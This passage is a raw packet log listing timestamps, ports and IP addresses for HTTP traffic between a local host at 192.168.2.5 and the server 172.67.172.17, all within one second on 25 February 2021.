Feb 25, 2021 11:05:05.217547894 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.217564106 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.217572927 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.217580080 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.217631102 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.218200922 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.218224049 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.218239069 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.218254089 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.218271017 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.218271971 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.218286991 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.218305111 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.218319893 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.218338966 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.218410015 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.219127893 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.219146967 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.219162941 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.219178915 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.219196081 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.219203949 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.219212055 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.219228029 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.219245911 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.219280958 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.219310999 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.220114946 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.220134020 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.220149994 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.220165014 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.220186949 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.220190048 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.220195055 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.220205069 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.220225096 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.220237017 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.220285892 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.221012115 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.221060038 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.221076965 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.221091986 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.221111059 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.221146107 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.221165895 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.221185923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.221204996 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.221220970 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.221225023 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.221236944 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.221286058 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.221313000 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.221406937 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.221993923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.222012043 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.222028971 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.222044945 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.222079039 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.222101927 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.222120047 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.222120047 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.222136021 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.222141981 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.222151995 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.222172022 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.222948074 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.222965002 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.223004103 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.223007917 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.223022938 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.223042011 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.223057985 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.223058939 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.223074913 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.223099947 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.223104000 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.223128080 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.224721909 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.224740982 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.224759102 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.224765062 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.224781036 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.224797010 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.224816084 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.224831104 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.224833965 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.224886894 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.225147963 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.225167036 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.225182056 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.225198030 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.225214958 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.225227118 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.225251913 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.225271940 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.225274086 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.225294113 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.225353003 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.226129055 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.226161003 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.226181030 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.226200104 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.226219893 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.226227999 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.226239920 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.226255894 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.226265907 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.226283073 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.226288080 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.226306915 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.227078915 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.227109909 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.227130890 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.227150917 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.227152109 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.227171898 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.227190971 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.227197886 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.227211952 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.227231979 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.227248907 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.227308035 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.227951050 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.227981091 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.228002071 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.228022099 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.228041887 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.228046894 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.228069067 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.228076935 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.228085041 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.228106022 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.228127003 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.228154898 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.228199959 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.228914022 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.228943110 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.228969097 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.228991032 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.229010105 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.229032040 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.229109049 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.345623016 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.392534018 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424154997 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424216032 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424246073 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424268007 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424290895 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424310923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424333096 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424335957 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424360037 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424381018 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424381971 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424402952 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424424887 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424424887 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424448013 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424459934 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424472094 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424483061 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424494982 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424535036 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424539089 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424561977 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424592018 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424607992 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424613953 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424635887 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424662113 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424675941 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424688101 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424710035 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424710989 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424732924 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424742937 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424756050 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424797058 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424818039 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424818993 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424844027 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424868107 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424885988 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424889088 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424912930 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424921036 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424936056 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424957037 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424963951 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.424981117 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.424993038 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.425003052 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425026894 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425049067 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.425050974 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425092936 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425095081 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.425117016 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425138950 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425164938 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425168991 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.425189018 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425199986 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.425210953 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425232887 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425254107 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425262928 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.425302982 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.425684929 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425709963 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425731897 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425754070 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425779104 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425782919 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.425803900 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425821066 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.425826073 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425848961 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.425848961 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425872087 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425883055 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.425894976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425918102 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425941944 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.425960064 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.425983906 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426001072 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.426007032 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426031113 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426054001 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426071882 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.426075935 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426101923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426110029 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.426125050 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426143885 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.426623106 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426651955 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426675081 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426700115 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426722050 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426739931 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.426743984 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426786900 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426795959 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.426812887 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426816940 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.426836014 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426856995 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426881075 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426896095 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.426902056 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426923037 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426935911 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.426944971 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426966906 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.426970959 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.426992893 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427010059 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.427016973 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427037001 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427057981 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.427059889 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427100897 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.427545071 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427573919 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427594900 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427617073 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427629948 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.427640915 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427659988 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.427664042 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427685022 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427701950 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.427709103 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427748919 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427757978 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.427773952 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427794933 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427815914 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.427817106 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427839041 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427854061 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.427860022 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427881002 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427901983 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427911043 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.427923918 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427934885 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.427948952 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427970886 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.427994967 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.428455114 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428481102 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428504944 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428527117 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428534985 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.428550005 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428570986 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428580999 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.428591967 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428605080 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.428613901 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428632021 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.428637028 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428661108 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428677082 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.428683996 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428704023 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428725004 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428741932 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.428746939 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428769112 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428771973 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.428791046 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428808928 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.428812027 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428838015 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428864002 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.428864956 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.428910971 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.429430008 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.429461956 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.429483891 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.429527998 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.429537058 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.429552078 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.429572105 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.429574013 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.429594994 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.429619074 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.429636002 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.429641008 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.429661989 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.429671049 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.429683924 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.429704905 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.429714918 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.429727077 CET	80	49727	172.67.172.17	192.168.2.5
